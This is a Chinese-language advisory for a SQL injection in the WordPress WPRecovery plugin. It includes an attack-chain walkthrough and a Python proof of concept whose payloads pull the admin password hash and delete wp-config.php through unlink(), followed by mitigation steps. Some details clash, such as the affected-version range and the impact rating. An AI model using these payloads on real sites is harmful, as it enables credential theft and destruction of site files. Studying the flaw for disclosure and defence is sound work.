CVE-2025-10726：WordPress WPRecovery插件SQL注入漏洞

漏洞信息

漏洞编号

CVE-2025-10726

漏洞类型

SQL注入（SQL Injection）

CVSS评分

9.1 严重

攻击向量

网络 (AV:N)

认证要求

无需认证 (PR:N)

用户交互

无需交互 (UI:N)

影响产品

WordPress WPRecovery插件

漏洞概述

CVE-2025-10726是WordPress WPRecovery插件中存在的一个严重SQL注入漏洞。该漏洞影响该插件所有版本，最高至2.0版本（含）。该漏洞由WordPress安全公司Wordfence的安全研究员发现并报告，CVSS评分为9.1分，属于严重级别。

WPRecovery是一款用于WordPress网站备份和恢复的插件。由于该插件在处理用户输入参数时，未对用户提供的'data[id]'参数进行充分的转义处理，且在构建SQL查询时未使用参数化查询或预编译语句，导致攻击者可以通过构造恶意的SQL语句注入到原有查询中。由于该漏洞无需任何身份认证即可利用，且无需用户交互，攻击者可以通过网络远程发起攻击。

更为严重的是，该SQL注入的查询结果会被直接传递给PHP的`unlink()`函数。这意味着攻击者不仅可以通过SQL注入从数据库中提取敏感信息（如管理员凭据、用户数据等），还可以通过注入文件路径来删除服务器上的任意文件。这种组合利用方式使得该漏洞的危害程度大大增加，攻击者可能通过删除关键文件导致网站完全不可用，甚至可能通过删除安全相关文件来为进一步攻击创造条件。

该漏洞已于2025年10月3日公开披露，鉴于其严重性和利用难度较低，网站管理员应尽快检查并更新其WPRecovery插件。

技术细节

该漏洞的核心问题在于WPRecovery插件的`delete_backup.php`和`index.php`文件中对用户输入参数处理不当。具体技术细节如下：

1. **注入点**：漏洞位于'data[id]'参数中。该参数在所有受影响的版本中均未经过适当的转义或验证，直接被拼接到SQL查询语句中。

2. **根本原因**：插件开发者使用了字符串拼接的方式构建SQL查询，而非使用WordPress推荐的`$wpdb->prepare()`方法进行参数化查询。这使得攻击者可以通过在参数中注入SQL语句片段（如单引号闭合、UNION SELECT等）来操控查询逻辑。

3. **利用方式**：由于无需认证（PR:N），攻击者可以直接向存在漏洞的端点发送包含恶意SQL的HTTP请求。典型Payload如：`data[id]=1' UNION SELECT '/path/to/target/file' -- `

4. **危险组合**：该漏洞的特殊之处在于SQL查询的结果会被直接传递给PHP的`unlink()`函数。`unlink()`是PHP中用于删除文件的函数。这意味着攻击者不仅可以通过SQL注入提取数据库中的敏感信息（如管理员密码哈希、用户邮箱等），还可以通过精心构造的UNION查询返回任意文件路径，从而触发`unlink()`删除服务器上的任意文件。这可能导致网站配置文件被删除、WordPress核心文件被破坏，甚至可能删除`.htaccess`等安全配置文件。

5. **影响范围**：由于漏洞存在于所有版本至2.0，攻击者无需复杂的绕过技巧即可利用。CVSS向量显示该漏洞对机密性影响为低（因为主要影响是文件删除而非数据窃取），但对完整性和可用性影响为高。

攻击链分析

STEP 1

步骤1：漏洞发现与目标识别

攻击者通过自动化扫描工具或手动分析，识别运行WordPress的网站是否安装了WPRecovery插件（版本≤2.0）。攻击者可以通过访问/wp-content/plugins/wprecovery/readme.txt或相关资源文件来确认插件的存在和版本。

STEP 2

步骤2：构造恶意SQL注入Payload

攻击者构造包含恶意SQL语句的HTTP请求，通过'data[id]'参数注入UNION SELECT等SQL片段。由于该参数未经过适当转义处理，恶意SQL语句会被拼接到原始查询中执行。

STEP 3

步骤3：发送未认证的攻击请求

攻击者直接向目标网站的易受攻击端点（如admin-ajax.php或delete_backup.php）发送POST请求。由于漏洞无需认证（PR:N）且无需用户交互（UI:N），攻击可以完全自动化进行。

STEP 4

步骤4：提取敏感数据库信息

通过UNION-based SQL注入，攻击者可以提取WordPress数据库中的敏感信息，包括管理员用户名、密码哈希、用户邮箱、API密钥等。

STEP 5

步骤5：触发任意文件删除

利用SQL注入结果被传递给PHP unlink()函数的特性，攻击者通过UNION查询返回任意文件路径（如wp-config.php、.htaccess等），触发unlink()删除服务器上的关键文件。

STEP 6

步骤6：进一步渗透或破坏

删除关键文件后，攻击者可以进一步利用提取的管理员凭据登录后台，或通过删除安全文件（如安全插件配置文件）来为后续攻击创造条件，最终可能导致网站完全被控制或破坏。

PoC / 利用代码

⚠️ 仅供安全研究

以下代码仅用于安全研究和授权测试，未经授权使用属于违法行为。

PoC

# CVE-2025-10726 PoC - WPRecovery SQL Injection
# Vulnerability: SQL Injection via 'data[id]' parameter
# Affected: WPRecovery plugin <= 2.0
# Author: Security Researcher

import requests

# Target configuration
TARGET_URL = "http://target-wordpress-site.com"
VULNERABLE_ENDPOINT = "/wp-admin/admin-ajax.php"
# Alternative endpoint based on delete_backup.php
ALT_ENDPOINT = "/wp-content/plugins/wprecovery/delete_backup.php"

def exploit_sql_injection(target_url):
    """
    Exploit SQL injection in WPRecovery plugin's 'data[id]' parameter.
    The injected SQL result is passed to PHP's unlink() function,
    allowing arbitrary file deletion.
    """
    # Step 1: Extract sensitive information via UNION-based SQL injection
    # Payload to extract admin user credentials
    sqli_payload_info = {
        "action": "wprecovery_delete_backup",
        "data[id]": "1' UNION SELECT CONCAT(user_login,':',user_pass) FROM wp_users WHERE ID=1-- "
    }

    # Step 2: Delete arbitrary files via SQL injection + unlink()
    # Payload to delete a specific file on the server
    sqli_payload_delete = {
        "action": "wprecovery_delete_backup",
        "data[id]": "1' UNION SELECT '/var/www/html/wp-config.php'-- "
    }

    headers = {
        "User-Agent": "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36",
        "Content-Type": "application/x-www-form-urlencoded"
    }

    try:
        # Attempt information extraction
        print("[*] Attempting SQL injection to extract sensitive data...")
        response = requests.post(
            target_url + VULNERABLE_ENDPOINT,
            data=sqli_payload_info,
            headers=headers,
            timeout=10
        )
        print(f"[+] Response Status: {response.status_code}")
        print(f"[+] Response Body: {response.text[:500]}")

        # Attempt arbitrary file deletion
        print("\n[*] Attempting arbitrary file deletion via SQL injection...")
        response = requests.post(
            target_url + VULNERABLE_ENDPOINT,
            data=sqli_payload_delete,
            headers=headers,
            timeout=10
        )
        print(f"[+] Response Status: {response.status_code}")
        print(f"[+] Response Body: {response.text[:500]}")

    except requests.exceptions.RequestException as e:
        print(f"[-] Error: {e}")

if __name__ == "__main__":
    exploit_sql_injection(TARGET_URL)

# Example raw HTTP request:
# POST /wp-admin/admin-ajax.php HTTP/1.1
# Host: target-site.com
# Content-Type: application/x-www-form-urlencoded
#
# action=wprecovery_delete_backup&data[id]=1' UNION SELECT '/path/to/file'-- 

影响范围

WordPress WPRecovery插件 < 2.0

WordPress WPRecovery插件 <= 2.0

防御指南

临时缓解措施

在官方发布修复版本之前，建议采取以下临时缓解措施：1）立即禁用WPRecovery插件以阻止漏洞被利用；2）如果业务需要使用该插件，可通过WAF规则过滤包含SQL关键字（如UNION、SELECT、FROM等）的请求；3）修改Web服务器配置，限制对/wp-content/plugins/wprecovery/目录下PHP文件的访问；4）监控数据库日志和文件操作日志，及时发现异常SQL查询和文件删除操作；5）对网站进行完整备份，以便在遭受攻击后能够快速恢复。